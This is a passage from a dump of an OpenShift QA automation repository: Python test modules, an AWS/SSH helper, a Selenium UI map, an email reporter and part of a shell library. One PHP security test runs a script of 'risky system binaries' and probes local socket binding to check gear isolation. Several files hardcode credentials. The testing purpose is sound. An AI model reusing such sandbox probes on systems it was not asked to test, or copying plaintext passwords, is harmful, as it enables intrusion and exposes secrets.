fr.read()\n fr.close()\n obj = re.search(r'AWSAccessKeyId\\s*=\\s*(\\S+)',content)\n if obj:\n self.AWSAccessKeyId = obj.group(1)\n else:\n log.error(\"Bad format of ~/.awscred file: AWSAccessKeyId key is missing\")\n obj = re.search(r'AWSSecretKey\\s*=\\s*(\\S+)', content)\n if obj:\n self.AWSSecretKey= obj.group(1)\n else:\n log.error(\"Bad format of ~/.awscred file: AWSSecretKey key is missing\")\n\n return (self.AWSAccessKeyId, self.AWSSecretKey)\n\n\ndef get_ami(instance_ip):\n import paramiko\n import os\n private_key_file = os.path.expanduser(\"~/.ssh/libra.pem\")\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n mykey = paramiko.RSAKey.from_private_key_file(private_key_file)\n\n ssh.connect(instance_ip, username='root', pkey=mykey)\n stdin, stdout, stderr = ssh.exec_command(\"facter | grep ami_id\")\n ami_id = stdout.readline().split('=>')[1].strip()\n return ami_id\n\ndef _test():\n aws = AWS_Console()\n image = aws.get_image('ami-e7c51c8e')\n #node = aws.create_node('libcloud-dev', image)\n #nodes = aws.list_nodes()\n node = aws.create_node('ppp-dev', image, 't1.micro')\n\nif __name__ == '__main__':\n (options, args)= config_parser()\n \n aws = AWS_Console()\n if options.action == 'list':\n log.info(\"Getting a list of images...\")\n images = aws.list_images()\n\n elif options.action == 'create':\n ami_id = None\n if options.image_name is None:\n # find the latest devenv\n image_dict = aws.get_all_devenv_images()\n target_image = image_dict[max(sorted(image_dict))]\n log.info(\"User did not specify an ami or devenv name, using the latest '%s'\" % target_image.name)\n else:\n target_image = aws.get_filtered_image(options.image_name)\n log.info(\"Create instance from ami '%s'...\" % target_image.id)\n aws.create_node(options.name, target_image, options.image_type)\n\n elif options.action == 'stop':\n inst = aws.stop_node(options.name)\n else:\n log.error(\"Unsupported action '%s'\" % options.action)\n parser.print_help()\n" }, { "alpha_fraction": 0.6755386590957642, "alphanum_fraction": 0.6818757653236389, "avg_line_length": 22.205883026123047, "blob_id": "cb0058be1e78a714861432b3aad0ccd3bace1ffe", "content_id": "b5c49ecaeb10357e4701eb546b74b97f9bbd4e81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 789, "license_type": "no_license", "max_line_length": 65, "num_lines": 34, "path": "/automation/Example/ui_mapping/homepage.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nUI elements mapping and strings for home page.\n\nAuthor: Xin Gao <[email protected]>\n\"\"\"\n\nfrom selenium.webdriver.common.by import By\n\nfrom hta2.core import UIMap\nfrom hta2.utils.enum import Enum\nfrom hta2.conf import settings as config\n\n\nlocation = config.url\nadmin_url = config.admin_url\n\n# Home page header elements\nheader = Enum(\n login_link = UIMap(By.ID, 'login_link_top'),\n username_input = UIMap(By.ID, 'Bugzilla_login_top'),\n password_input = UIMap(By.ID, 'Bugzilla_password_top'),\n login_btn = UIMap(By.ID, 'log_in_top'),\n admin_link = UIMap(By.XPATH, '//div/ul/li[11]/a'),\n)\n\n# Home page body elements\nbody = Enum(\n quick_search_help_link = (By.LINK_TEXT, 'Quick Search help'),\n)\n\n# Home page footer elements\nfooter = Enum(\n legal_link = (By.LINK_TEXT, 'Legal'),\n)\n" }, { "alpha_fraction": 0.6334841847419739, "alphanum_fraction": 0.6410256624221802, "avg_line_length": 29.136363983154297, "blob_id": "a51bf0f06eae9e971947b6b7f2c7639959c34679", "content_id": "10d41b31456e650bb93bbbbf1c02c0245544e15e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1326, "license_type": "no_license", "max_line_length": 105, "num_lines": 44, "path": "/automation/open/testmodules/RT/hot_deploy/php_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nSept 26, 2012\n\n\n\"\"\"\nimport rhtest\nimport common\nfrom hot_deploy_test import HotDeployTest\n\nclass PHPHotDeployWithoutJenkins(HotDeployTest):\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_name = common.getRandomString()\n self.config.application_type = common.app_types['php']\n self.config.scalable = False\n self.config.jenkins_is_needed = False\n self.config.summary = \"[US2309] Hot deployment support for non-scaling PHP app - without Jenkins\"\n \n def configuration(self):\n self.log_info(\"Creating the application to check PID\")\n self.config.file_name = \"pid.php\"\n self.info(\"Editing file '%s'...\" % self.config.file_name)\n php_file = open(\"./%s/php/%s\" % (self.config.application_name, self.config.file_name), \"w\")\n php_file.write(\"<?php\\n\")\n php_file.write(\"header('Content-type: text/plain');\")\n php_file.write(\"echo getmypid();\")\n php_file.write(\"?>\")\n php_file.close()\n self.deploy()\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PHPHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5140271782875061, "alphanum_fraction": 0.5176470875740051, "avg_line_length": 29.66666603088379, "blob_id": "9c427561734819e6f31d73890716d3114c832c04", "content_id": "3629cf9258fe020c3e520cf944ec6c54212a342c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1105, "license_type": "no_license", "max_line_length": 88, "num_lines": 36, "path": "/automation/open/testmodules/RT/cucumber/cartridge-php.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\n\n\nif __name__ == '__main__':\n user_email = os.environ[\"OPENSHIFT_user_email\"]\n user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n app_type = \"perl-5.10\"\n app_name = \"testapp\"\n app_repo = \"/tmp/%s_repo\" %(app_name)\n\n common.env_setup()\n steps_list = []\n\n print \"Running this now\"\n feature = os.path.join(WORK_DIR,\"cartridge-php.feature\")\n cmd = \"cucumber %s\" % feature\n step = testcase.TestCaseStep(\"Add Remove Alias a PHP Application\",\n cmd,\n function_parameters=[],\n expect_return=0,\n expect_string_list=[\"no local repo has been created\"],\n )\n\n steps_list.append(step)\n\n case = testcase.TestCase(\"Add Remove Alias a PHP Application\",\n steps_list\n )\n case.run()\n\n" }, { "alpha_fraction": 0.6809903383255005, "alphanum_fraction": 0.6829823851585388, "avg_line_length": 26.4375, "blob_id": "d0b81957a45926b3cbd0b26f1c2d89641f64b57a", "content_id": "3c2fbc55b077eec099e74518384828f28ed9e6d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3514, "license_type": "no_license", "max_line_length": 99, "num_lines": 128, "path": "/automation/open/lib/reports/Email.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\nReport objects that sends a text email.\n\n\"\"\"\n\nimport sys, os\nimport reports\nNO_MESSAGE = reports.NO_MESSAGE\n\nfrom cStringIO import StringIO\n\nimport ezmail\n\nclass ReportMessage(ezmail.MIMEMultipart.MIMEMultipart, ezmail.AutoMessageMixin):\n\tdef __init__(self, From=None, To=None):\n\t\tezmail.MIMEMultipart.MIMEMultipart.__init__(self)\n\t\tezmail.AutoMessageMixin.__init__(self, From, To)\n\nclass EmailReport(reports.NullReport):\n\t\"\"\"Create an a report that is emailed, rather than written to a file. \n\tEmailReport(\n\t\t[formatter=\"text/plain\"], # formatter type\n\t\t[recipients=None], # list of recipients, or None. If none the\n\t\t # message is mailed to self (From address).\n\t\t[From=None], # Address for From field. If None the current user is used.\n\t\t)\n\n\t\"\"\"\n\tdef __init__(self, formatter=\"text/plain\", recipients=None, From=None):\n\t\tself._logfile = None\n\t\tself._message = ReportMessage()\n\t\tself._message.From(From)\n\t\tself._message.To(recipients)\n\t\tself._formatter, ext = reports.get_formatter(formatter)\n\n\tfilename = property(lambda s: None)\n\tfilenames = property(lambda s: [])\n\tmimetype = property(lambda s: s._formatter.MIMETYPE)\n\n\tdef initialize(self):\n\t\tself._fo = StringIO()\n\t\tself.write(self._formatter.initialize())\n\n\tdef logfile(self, lf):\n\t\tself._logfile = str(lf)\n\n\tdef write(self, text):\n\t\tself._fo.write(text)\n\n\tdef writeline(self, text):\n\t\tself._fo.write(text)\n\t\tself._fo.write(\"\\n\")\n\n\tdef finalize(self):\n\t\t\"\"\"finalizing this Report sends off the email.\"\"\"\n\t\tself.write(self._formatter.finalize())\n\t\treport = ezmail.MIMEText.MIMEText(self._fo.getvalue(), self._formatter.MIMETYPE.split(\"/\")[1])\n\t\treport[\"Content-Disposition\"] = \"inline\"\n\t\tself._message.attach(report)\n\t\tif self._logfile:\n\t\t\ttry:\n\t\t\t\tlfd = file(self._logfile).read()\n\t\t\texcept:\n\t\t\t\tpass # non-fatal\n\t\t\t\tprint >>sys.stderr, \"could not read or attach log file: %r\" % (self._logfile,)\n\t\t\telse:\n\t\t\t\tlogmsg = ezmail.MIMEText.MIMEText(lfd)\n\t\t\t\tlogmsg[\"Content-Disposition\"] = 'attachment; filename=%s' % (os.path.basename(self._logfile), )\n\t\t\t\tself._message.attach(logmsg)\n\t\tezmail.mail(self._message)\n\n\tdef add_title(self, title):\n\t\tself._message.add_header(\"Subject\", title)\n\t\tself.write(self._formatter.title(title))\n\n\tdef add_heading(self, text, level=1):\n\t\tself.write(self._formatter.heading(text, level))\n\n\tdef add_message(self, msgtype, msg, level=1):\n\t\tself.write(self._formatter.message(msgtype, msg, level))\n\n\tdef add_summary(self, text):\n\t\tself.write(self._formatter.summary(text))\n\n\tdef passed(self, msg=NO_MESSAGE):\n\t\tself.add_message(\"PASSED\", msg)\n\n\tdef failed(self, msg=NO_MESSAGE):\n\t\tself.add_message(\"FAILED\", msg)\n\n\tdef incomplete(self, msg=NO_MESSAGE):\n\t\tself.add_message(\"INCOMPLETE\", msg)\n\n\tdef abort(self, msg=NO_MESSAGE):\n\t\tself.add_message(\"ABORTED\", msg)\n\n\tdef info(self, msg):\n\t\tself.add_message(\"INFO\", msg)\n\n\tdef diagnostic(self, msg):\n\t\tself.add_message(\"DIAGNOSTIC\", msg)\n\n\tdef add_text(self, text):\n\t\tself.write(self._formatter.text(text))\n\n\tdef add_url(self, text, url):\n\t\tself.write(self._formatter.url(text, url))\n\n\tdef newpage(self):\n\t\tself.write(self._formatter.newpage())\n\n\tdef newsection(self):\n\t\tself.write(self._formatter.section())\n\n\n\nif __name__ == \"__main__\":\n\trpt = EmailReport(\"text/plain\", recipients=[\"[email protected]\"])\n\trpt.initialize()\n\trpt.add_title(\"Email report self test.\")\n\trpt.info(\"Some non-useful info. 8-)\")\n\trpt.finalize()\n\n\n" }, { "alpha_fraction": 0.49139344692230225, "alphanum_fraction": 0.49877050518989563, "avg_line_length": 26.11111068725586, "blob_id": "92f237625eee53f5eb08a50b04519c5173d2f7b8", "content_id": "e5d6c9a0fb982832a7c0090fad09a6dcf636ca20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2440, "license_type": "no_license", "max_line_length": 71, "num_lines": 90, "path": "/automation/open/testmodules/RT/security/data/execute_risky_system_binaries.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\n\nfunction run_system_cmd($command) {\n$io = array();\n$p = proc_open($command,\n array(1 => array('pipe', 'w'),\n 2 => array('pipe', 'w')),\n $io);\n\n/* Read output sent to stdout. */\nwhile (!feof($io[1])) {\n $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),\n ENT_COMPAT, 'UTF-8');\n}\n\n/* Read output sent to stderr. */\nwhile (!feof($io[2])) {\n $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),\n ENT_COMPAT, 'UTF-8');\n}\n\n\nfclose($io[1]);\nfclose($io[2]);\nproc_close($p);\n\nreturn $_SESSION['output'];\n}\n\nfunction socket_binding($port) {\n error_reporting(E_ALL);\n $address = 'localhost';\n $service_port = $port;\n \n echo \"Connecting \".$address.\":\".$service_port.\"\\n\";\n echo \"Create socket..........\\n\";\n $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\n if ($socket === false) {\n $error_id = socket_last_error();\n echo \"Error: \".$error_id.\" - \".socket_strerror($error_id).\"\\n\";\n echo \"SOCKET CREATE: Fail-1. \\n\";\n } else {\n echo \"SOCKET CREATE: OK-1.\\n\";\n }\n \n \n echo \"Connect socket..........\\n\";\n $result = socket_connect($socket, $address, $service_port);\n if ($result === false) {\n $error_id = socket_last_error();\n echo \"Error: \".$error_id.\" - \".socket_strerror($error_id).\"\\n\";\n echo \"SOCKET CONNECT: Fail-2. \\n\";\n $RESULT=\"PASS\";\n } else {\n echo \"SOCKET CONNECT: OK-2.\\n\";\n $RESULT=\"FAIL\";\n }\n \n echo \"Send Command..........\\n\";\n $in = \"quit\\n\";\n $result = socket_write($socket, $in, strlen($in));\n if ($result === false) {\n $error_id = socket_last_error();\n echo \"Error: \".$error_id.\" - \".socket_strerror($error_id).\"\\n\";\n echo \"SOCKET WRITE: Fail-3. \\n\";\n } else {\n echo \"SOCKET WRITE: OK-3.\\n\";\n }\n \n echo \"Close socket........\\n\";\n $result = socket_close($socket);\n if ($result === false) {\n $error_id = socket_last_error();\n echo \"Error: \".$error_id.\" - \".socket_strerror($error_id).\"\\n\";\n echo \"SOCKET CLOSE: Fail-4. \\n\";\n } else {\n echo \"SOCKET CLOSE: OK-4.\\n\";\n }\n\n echo \"\\n\\n\\n\";\n\n return $RESULT;\n}\n\necho \"Welcome~~~~~~~\\n\";\n$command = \"/bin/sh execute_risky_system_binaries.sh\";\n$output = run_system_cmd($command);\necho $output;\n\n?>\n" }, { "alpha_fraction": 0.5968477725982666, "alphanum_fraction": 0.5985068678855896, "avg_line_length": 29.91025733947754, "blob_id": "02805e38692a18c72000839e69c952f98a923f21", "content_id": "f29aca9ada995e39bbb77d361d611f5186ec0baf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2411, "license_type": "no_license", "max_line_length": 147, "num_lines": 78, "path": "/automation/open/testmodules/RT/job_related/apps_clean_up.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n self.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.domain_name = common.get_domain_name()\n\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rhc domain delete %s -l %s -p '%s' %s\"% (self.domain_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n os.system(\"rm -rf /tmp/OPENSHIFT_OSConf-%s.dump\"%self.user_email)\n\n\nclass AppsCleanUp(OpenShiftTest):\n def test_method(self):\n step = testcase.TestCaseStep(\"Re-inintilize OSConf file\",\n OSConf.initial_conf,\n function_parameters=[],\n expect_return=0\n )\n self.steps_list.append(step)\n \n step = testcase.TestCaseStep(\"Clean all the apps of the user\",\n common.clean_up,\n function_parameters=[self.user_email, self.user_passwd],\n expect_return=0)\n self.steps_list.append(step)\n\n ''' MOVED TO FINALIZE()....\n step = testcase.TestCaseStep(\"Destroy domain namesplace\",\n \"rhc domain delete %s -l %s -p %s\"% (self.domain_name, self.user_email, self.user_passwd),\n expect_return=0)\n self.steps_list.append(step)\n \n step = testcase.TestCaseStep(\"Clean OSConf dump file\",\n \"rm -rf /tmp/OPENSHIFT_OSConf-%s.dump\"%self.user_email,\n expect_return=0)\n self.steps_list.append(step)\n '''\n\n case = testcase.TestCase(\"Clean all the apps of the user\", self.steps_list)\n case.run()\n\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AppsCleanUp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5885146856307983, "alphanum_fraction": 0.5924006700515747, "avg_line_length": 31.619718551635742, "blob_id": "1aaafaf5dd992de3fb4aca1339ffa9973d0a6bcf", "content_id": "9b5aeed2d14292c78a6e623b9bbd85ed43efa6a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2316, "license_type": "no_license", "max_line_length": 104, "num_lines": 71, "path": "/automation/open/testmodules/RT/hot_deploy/jbossas_exploded_wars_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 7, 2012\n\"\"\"\n\nimport os\nimport shutil\nimport rhtest\nimport common\nfrom jbossas_without_jenkins import JBossHotDeployWithoutJenkins\n\nclass JBossHotDeployExplodedWarsWithoutJenkins(JBossHotDeployWithoutJenkins):\n\n def __init__(self, config):\n JBossHotDeployWithoutJenkins.__init__(self, config)\n self.config.summary = \"[US2443] Hot deployment support for Jboss application with exploded wars\"\n self.config.deploy_dir = \"deployments\"\n self.config.app_template_dir = os.path.dirname(__file__) + \"/../cartridge/app_template\"\n self.config.war_files = [ \"weldguess.war\", \"sample.war\" ]\n\n def war(self, operation, war_file):\n war_dir = \"./%s/%s/%s\" % ( self.config.application_name, self.config.deploy_dir, war_file )\n war_dir_marker = war_dir + \".dodeploy\"\n if operation == \"add\":\n # Creating the directory\n os.mkdir(war_dir)\n # Exploding the war file\n steps = [\n \"cd %s\" % war_dir,\n \"jar -xvf %s\" % self.config.app_template_dir + \"/\" + war_file\n ]\n common.command_get_status(\" && \".join(steps))\n # Adding marker\n marker = file(war_dir_marker, \"a\")\n marker.close()\n elif operation == \"remove\":\n # Removing the exploded war\n shutil.rmtree(war_dir)\n os.remove(war_dir_marker)\n # ... and deploying\n self.deploy()\n\n def test_method(self):\n self.enable_jenkins()\n self.enable_hot_deployment()\n self.configuration()\n pid_original = self.get_process_id()\n for war in self.config.war_files:\n self.war(\"add\", war)\n pid_new = self.get_process_id()\n self.verification(pid_original, pid_new)\n for war in self.config.war_files:\n for operation in [ \"remove\", \"add\" ]:\n self.war(operation, war)\n pid_new = self.get_process_id()\n self.verification(pid_original, pid_new)\n \n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JBossHotDeployExplodedWarsWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.582194983959198, "alphanum_fraction": 0.5903595685958862, "avg_line_length": 36.24561309814453, "blob_id": "040f154f3683481c8904930b4d8b89c8c6b531bd", "content_id": "bd2c9f20c52d7f87896657309c0a5e2c72be8c99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6369, "license_type": "no_license", "max_line_length": 152, "num_lines": 171, "path": "/automation/open/testmodules/RT/node/jenkins_builder_size.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nAttila Nagy\[email protected]\nMay 5, 2012\n\n[US2001][Runtime][rhc-node] jenkins show correct builder size in config page\n\"\"\"\n\nimport rhtest\nimport common\nimport OSConf\nimport pycurl\nfrom StringIO import StringIO\nfrom time import sleep\nfrom shutil import rmtree\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[US2001][Runtime][rhc-node] jenkins show correct builder size in config page\"\n self.app_name_small = \"myphpsmall\"\n self.app_name_medium = \"myjbossmedium\"\n\n common.env_setup(cleanup=True)\n\n def finalize(self):\n for repo in [ self.app_name_small, self.app_name_medium ]:\n rmtree(repo, ignore_errors = True)\n if self.get_run_mode() == \"DEV\":\n common.change_node_profile(\"small\")\n common.remove_gearsize_capability('medium') #default is small only\n \nclass JenkinsBuilderSize(OpenShiftTest):\n \n def test_method(self):\n # This step is needed to create builder machines\n if self.get_run_mode() == \"DEV\":\n common.add_gearsize_capability('medium')\n #\n # Step 1\n #\n self.info(\"1. create jenkins server app\")\n ret_code = common.create_app(\"jenkins\", \n common.app_types[\"jenkins\"], \n clone_repo = False)\n \n self.assert_equal(ret_code, 0, \"Jenkis app must be created successfully\")\n #\n # Step 2 \n #\n self.info(\"2. go to jenkins config page check the builder size\")\n app_cache = OSConf.get_apps()\n self.jenkins_url = app_cache['jenkins']['url']\n self.jenkins_username = app_cache['jenkins']['username']\n self.jenkins_password = app_cache['jenkins']['password']\n sleep(120)\n jenkins_config_output = self.get_jenkins_page(\"configure\")\n \n # Waiting for Jenkins to stand up\n \n str2find='<select name=\"defaultBuilderSize\"><option selected=\"true\" value=\"small\">Small</option><option value=\"medium\">Medium</option></select>'\n self.assert_true(\n jenkins_config_output.find(str2find) != -1,\n \"Drop-down list 'Default Builder Size' must contain options 'Small' and 'Medium' (small as default)\")\n\n #\n # Step 3\n #\n self.info(\"3. create a small gear size app with jenkins enabled\")\n\n ret_code = common.create_app(self.app_name_small, common.app_types[\"php\"])\n self.assert_equal(ret_code, 0, \"App must be created successfully\")\n\n ret_code = common.embed(self.app_name_small, \n \"add-\" + common.cartridge_types[\"jenkins\"])\n self.assert_equal(ret_code, 0, \"Jenkins client must be embed successfully\")\n\n #\n # Step 4\n #\n self.info('4.go to jenkins console and check the application builder size in configure job page')\n jenkins_config_output = self.get_jenkins_page(\"job/%s-build/configure\" % self.app_name_small)\n str2find='<select name=\"builderSize\"><option selected=\"true\" value=\"small\">Small</option>'\n self.assert_true(\n jenkins_config_output.find(str2find) != -1,\n \"Drop-down list 'Default Builder Size' must contain options 'Small' and 'Medium'\"\n )\n #'<select name=\"builderSize\"><option selected=\"true\" value=\"small\">Small </option><option value=\"medium\">Medium</option></select>'\n\n #\n # Step 5\n #\n self.info(\"5.do some change and push the changes\")\n self.assert_true(\n self.deploy_new_file(\"./\" + self.app_name_small).find(\"SUCCESS\") != -1,\n \"Deployment must be successful\"\n )\n\n #\n # Step 6\n #\n if self.get_run_mode() == \"DEV\":\n self.info(\"6.create a medium gear size app with jenkins enabled\")\n common.change_node_profile(\"medium\")\n ret_code = common.create_app(self.app_name_medium, \n common.app_types[\"jbossas\"], \n gear_size = \"medium\")\n self.assert_equal(ret_code, 0, \"App must be created successfully\")\n\n ret_code = common.embed(self.app_name_medium, \n \"add-\" + common.cartridge_types[\"jenkins\"])\n self.assert_equal(ret_code, 0, \"Jenkins client must be embed successfully\")\n\n #\n # Step 7\n #\n self.info(\"7. go to jenkins console and check the application builder size in configure job page \")\n jenkins_config_output = self.get_jenkins_page(\"job/%s-build/configure\" % self.app_name_medium)\n str2find='<option selected=\"true\" value=\"medium\">Medium</option>'\n self.assert_true(\n jenkins_config_output.find(str2find) != -1,\n \"Drop-down list 'Default Builder Size' doesn't contain 'Medium' as default\")\n\n #\n # Step 8\n #\n self.info(\"8.do some change and push the changes\")\n self.assert_true(\n self.deploy_new_file(\"./\" + self.app_name_medium).find(\"SUCCESS\") != -1,\n \"Deployment must be successful\")\n\n return self.passed(self.summary)\n\n def get_jenkins_page(self, path):\n output = StringIO()\n curl = pycurl.Curl()\n curl.setopt(pycurl.VERBOSE, 1)\n curl.setopt(pycurl.URL, \"https://\" + self.jenkins_url + \"/\" + path)\n curl.setopt(pycurl.SSL_VERIFYPEER, 0)\n curl.setopt(pycurl.FOLLOWLOCATION, 1)\n curl.setopt(pycurl.WRITEFUNCTION, output.write)\n curl.setopt(pycurl.HTTPAUTH, pycurl.HTTPAUTH_BASIC)\n curl.setopt(pycurl.USERPWD, \"%s:%s\" % (self.jenkins_username, self.jenkins_password))\n curl.perform()\n return output.getvalue()\n\n def deploy_new_file(self, git_repo):\n file = open(git_repo + \"/\" + common.getRandomString(), \"w\")\n file.write(common.getRandomString())\n file.close()\n\n deployment_steps = [\n \"cd %s\" % git_repo,\n \"git add .\",\n \"git commit -a -m testing\",\n \"git push\"\n ]\n\n return common.command_getstatusoutput(\" && \".join(deployment_steps))[1]\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JenkinsBuilderSize)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5906432867050171, "alphanum_fraction": 0.5961257219314575, "avg_line_length": 31.951807022094727, "blob_id": "2fc18889b795ae285ec0ae11a036330391faff7e", "content_id": "3643ee584783a2daf95ac0aca654d9499bd04ff3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2736, "license_type": "no_license", "max_line_length": 182, "num_lines": 83, "path": "/automation/open/testmodules/RT/node/app_limit_per_user-concurrent_creation.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\n??\n??\n\"\"\"\n\nimport sys\nimport os\nimport string\nimport rhtest\n\nimport testcase\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_limit_per_user = common.get_max_gears() #string.atoi(os.environ[\"OPENSHIFT_app_limit_per_user\"])\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types[\"php\"]\n self.app_name_prefix = common.getRandomString(7)\n\nclass AppLimitPerUserConcurentCreation(OpenShiftTest):\n def test_method(self):\n ret_list = []\n for i in range(3):\n common.env_setup()\n step = testcase.TestCaseStep(\n \"Try %s: Create more apps than app_limit_per_user setting upon %s concurrent creation\" %(i + 1, self.app_limit_per_user + 2),\n self.concrrent_creation_step,\n function_parameters=[1, self.app_limit_per_user + 2],\n expect_description=\"No more apps beyond limit should be created\")\n\n (ret_dict, output) = step.run()\n # print ret_dict\n if ret_dict.values().count(0) == self.app_limit_per_user:\n ret_list.append(0)\n # Init OSConf to clean these apps in next iterval\n OSConf.initial_conf()\n else:\n ret_list.append(1)\n # Init OSConf to clean these apps in next script\n OSConf.initial_conf()\n break\n\n\n #print ret_list\n if ret_list.count(1) > 0:\n print \"Upon %s concurrent creation, more apps than app_limit_per_user is created - [FAIL]\" %(self.app_limit_per_user + 2)\n return self.failed(\"%s failed\" % self.__class__.__name__)\n else:\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n def concrrent_creation_step(self, start, end):\n command_list = []\n for i in range(start, end + 1):\n self.app_name = \"%s%s\" %(self.app_name_prefix, i)\n command_list.append(\"rhc app create %s %s -l %s -p '%s' --no-git %s\" %(self.app_name, self.app_type, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n\n ret_dict = common.multi_subprocess(command_list)\n for i in ret_dict.keys():\n print \"Command {%s} return: %s\" %(i, ret_dict[i])\n\n return ret_dict\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AppLimitPerUserConcurentCreation)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5431665778160095, "alphanum_fraction": 0.5583605766296387, "avg_line_length": 29.05620574951172, "blob_id": "158d680492ce19ce306a42627a57cc5f196146af", "content_id": "efceae9f49ee64a6d0fec9483ee843dc75dead22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 12834, "license_type": "no_license", "max_line_length": 229, "num_lines": 427, "path": "/automation/open/Longevity/function.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n###################################################\n# FileName: common_func.sh\n# Author: <[email protected]> \n# Description: provide the common fucntion for all test cases\n# Version: 1.0\n#*************************************************\n### Fuction List:\n#rhc_setup Setup rhc domain automation\n#app_create Create a new app\n#app_snapshot Snapshot app\n#app_restore Restore app from backup\n#app_delete Delete an new app according to app_name\n#app_delete_all Delete all apps\n#cartridge_add Added on cartridge to assigned app\n#cartridge_remove Remove a cartridge from assigned app\n#cartridge_oper_testing Testing cartridge operations\n#add_hot_deploy Hot_deploy function added to assigned app\n#add_disable_auto_scaling Disable auto scaling function to assigned app\n#ssh_app Ssh lonin the assigned app\n#app_service_pid Get app services pid\n#add_jenkins_client Added jenkins_client to app\n#rest_api REST API function,Now we support create/scale-up/scale-down\n#rest_api_delete Delete all using rest api command\n#alias_add Alias add to an app\n#alias_remove Alias remove from an app\n#url_check Check the app web service available\n#scale_check Scale-up/scale-down check\n#app_oper_testing App operation testing, stop/reload/start...\n#set_running_parameter Setup testing environment\n#rest_api_delete Delete All(app,domain...)\n#alias_add\n#alias_remove\n#add_mysql_data\n#delete_mysql_data\n###################################################\n\n. ./common_func.sh\n[ -f /usr/bin/expect ] || yum install expect -y\ngit config --global user.name \"Sun Ning\"\ngit config --global user.email \"[email protected]\"\npwd=`pwd`\nCONFIG_FILE=$pwd/AutoCreate.cfg\n#time=`date +%Y%m%d-%H%M%S`\n\nuser=`cat ~/.openshift/express.conf|grep default_rhlogin|awk -F= '{print $2}'`\npasswd=redhat\ndomain=`rhc domain show -predhat|sed -n 1p|awk '{print $3}'`\napp_number=`rhc domain show 